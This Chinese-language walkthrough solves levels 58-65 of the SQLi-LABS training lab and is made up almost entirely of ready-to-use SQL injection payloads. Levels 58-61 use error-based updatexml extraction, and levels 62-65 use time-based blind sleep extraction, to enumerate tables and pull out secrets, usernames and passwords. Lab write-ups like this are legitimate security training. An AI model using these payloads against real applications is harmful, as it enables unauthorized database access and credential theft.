SQL注入SQLi-LABS 靶场less58-65详细通关攻略

Less 58 GET -challenge -Double Query-5 queries allowed -Variation 1

一、判断闭合方式

复制代码
1' and 1=2 --+
1' and 1=1 --+

二、数据库名

复制代码
0' and updatexml(1,concat(1,(select database())),3) --+

三、数据表名

复制代码
0' and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema=database())),3) --+

四、字段名

复制代码
0' and updatexml(1,concat(1,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='a1emk6nnum')),3) --+

五、详细信息

复制代码
0' and updatexml(1,concat(1,(select group_concat(secret_UJMW)from a1emk6nnum)),3) --+

Less 59 GET -challenge -Double Query-5 queries allowed -Variation 2

一、判断闭合方式

复制代码
1 and 1=2 --+
1 and 1=1 --+

二、数据库名

复制代码
0 and updatexml(1,concat(1,(select database())),3) --+

三、数据表名

复制代码
0 and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema=database())),3) --+

四、字段名

复制代码
0 and updatexml(1,concat(1,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='qt15gj643b')),3) --+

五、详细信息

复制代码
0 and updatexml(1,concat(1,(select group_concat(secret_FCXS)from qt15gj643b)),3) --+

Less 60 GET -challenge -Double Query-5 queries allowed -Variation 3

一、判断闭合方式

复制代码
1") and 1=2 --+
1") and 1=1 --+

二、数据库名

复制代码
0") and updatexml(1,concat(1,(select database())),3) --+

三、数据表名

复制代码
0") and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema=database())),3) --+

四、字段名

复制代码
0") and updatexml(1,concat(1,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='cvn67poqbb')),3) --+

五、详细信息

复制代码
0") and updatexml(1,concat(1,(select group_concat(secret_FI7I)from cvn67poqbb)),3) --+

Less 61 GET -challenge -Double Query-5 queries allowed -Variation 4

一、判断闭合方式

复制代码
1')) and 1=2 --+
1')) and 1=1 --+

二、数据库名

复制代码
0')) and updatexml(1,concat(1,(select database())),3) --+

三、数据表名

复制代码
0')) and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema=database())),3) --+

四、字段名

复制代码
0')) and updatexml(1,concat(1,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='jw3fgs2t4d')),3) --+

五、详细信息

复制代码
0')) and updatexml(1,concat(1,(select group_concat(secret_1FWY)from jw3fgs2t4d)),3) --+

Less 62 GET -challenge -bind-130 queries allowed -Variation 1

因为有次数限制所以需要分批次进行,一次爆破最好不要超过130。

一、获取数据库名

抓包后放到攻击模块进行爆破,因为sleep超时所以出不来结果的就是正确值,下几条命令同理。

复制代码
1') and if((substr(database(),1,1))='s',sleep(5),1)

二、获取数据表名

复制代码
1') and  if(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)='s',sleep(4),1)

三、获取数据字段名

复制代码
1') and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name = users limit 1,1),1,1)='s',sleep(4),1)

四、获取数据信息

获取用户名和密码时更改第一个1即可。

复制代码
1') and if(substr((select username from users limit 1,1),1,1)='s',sleep(4),1) 
1') and if(substr((select password from users limit 1,1),1,1)='s',sleep(4),1)

Less 63 GET -challenge -bind-130 queries allowed -Variation 2

因为有次数限制所以需要分批次进行,一次爆破最好不要超过130。

一、获取数据库名

抓包后放到攻击模块进行爆破,因为sleep超时所以出不来结果的就是正确值,下几条命令同理。

复制代码
1' and if((substr(database(),1,1))='s',sleep(5),1)

二、获取数据表名

复制代码
1' and  if(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)='s',sleep(4),1)

三、获取数据字段名

复制代码
1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name = users limit 1,1),1,1)='s',sleep(4),1)

四、获取数据信息

获取用户名和密码时更改第一个1即可。

复制代码
1' and if(substr((select username from users limit 1,1),1,1)='s',sleep(4),1) 
1' and if(substr((select password from users limit 1,1),1,1)='s',sleep(4),1)

Less 64 GET -challenge -bind-130 queries allowed -Variation 3

因为有次数限制所以需要分批次进行,一次爆破最好不要超过130。

一、获取数据库名

抓包后放到攻击模块进行爆破,因为sleep超时所以出不来结果的就是正确值,下几条命令同理。

复制代码
1)) and if((substr(database(),1,1))='s',sleep(5),1)

二、获取数据表名

复制代码
1)) and  if(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)='s',sleep(4),1)

三、获取数据字段名

复制代码
1)) and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name = users limit 1,1),1,1)='s',sleep(4),1)

四、获取数据信息

获取用户名和密码时更改第一个1即可。

复制代码
1)) and if(substr((select username from users limit 1,1),1,1)='s',sleep(4),1) 
1)) and if(substr((select password from users limit 1,1),1,1)='s',sleep(4),1)

Less 65 GET -challenge -bind-130 queries allowed -Variation 4

因为有次数限制所以需要分批次进行,一次爆破最好不要超过130。

一、获取数据库名

抓包后放到攻击模块进行爆破,因为sleep超时所以出不来结果的就是正确值,下几条命令同理。

复制代码
1") and if((substr(database(),1,1))='s',sleep(5),1)

二、获取数据表名

复制代码
1") and  if(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1)='s',sleep(4),1)

三、获取数据字段名

复制代码
1") and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name = users limit 1,1),1,1)='s',sleep(4),1)

四、获取数据信息

获取用户名和密码时更改第一个1即可。

复制代码
1") and if(substr((select username from users limit 1,1),1,1)='s',sleep(4),1) 
1") and if(substr((select password from users limit 1,1),1,1)='s',sleep(4),1)